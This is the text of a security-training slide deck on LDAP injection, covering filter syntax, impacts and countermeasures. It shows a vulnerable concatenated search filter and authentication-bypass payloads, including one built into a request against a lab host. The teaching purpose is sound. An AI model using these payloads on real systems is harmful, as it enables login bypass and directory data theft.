Understand the web server architecture with LDAP server and what impact LDAP injection can cause.

1. LDAP Injection
Swapnil Jain
Date: 28 April 2020

2. #Who Am I
● Security Analyst
● Twitter @swapnil_jn

3. Overview
● LDAP Injection
● Authentication Bypass
● Demo
● Impact
● Securing Applications against LDAP Injection

4. LDAP Injection
The Lightweight Directory Access Protocol(LDAP) is used to store
information about users hosts, and many other objects.
LDAP injection is a type of attack on a web application where attackers
place code in a user input field in an attempt to gain unauthorized access
or information.

5. Basic LDAP Syntax
Common Operators:
● “=” (equal to)
● & (logical and)
● | (logical or)
● ! (logical not)
● * (wildcard)
Filter:
● (cn=sam)
● (cn=s*)
● (|(cn=s*)(cn=t*))
● (&(cn=s*)(sn=*d))

6. Normal Working
(&(cn=admin)(passwd=secret))
LDAP Server
Admin authenticated

7. Authentication Bypass
Username: admin)(&)),
Password: ignored
Web
Server
LDAP
Server
Directory Search
AdminSet Cookie:
PHPSESSIONID=admin

8. Test Case
● <input type="text" size=20
name="name">Enter the
Username to search for</input>
● Searchfilter="(cn="+name+")"
admin)(|(password=*) (cn=admin)(|(password=*) )

9. Authentication Bypass (Normal Request)

10. Payload Creation
Original Request :
http://10.90.100.50/ldap_lab/ldap/example2.php?name=hacker&password
=hacker
Payload : name=hacker)(cn=*))%00
Changed request:
http://10.90.100.50/ldap_lab/ldap/example2.php?name=hacker)(cn=*))%0
0&password=hacker

11. Authentication Bypass(Contd.)

12. Information Disclosure

13. Information Disclosure(Contd.)

14. Impact
● Authentication bypass
● Privilege escalation
● Information disclosure

15. Countermeasures
● LDAP special characters are safely escaped, including at least ( ) ! | & *
● Use Frameworks that Automatically Protect from LDAP Injection
○ LINQ to Active Directory provides LDAP encoding when building
LDAP queries.
● Least privilege

17. Thank You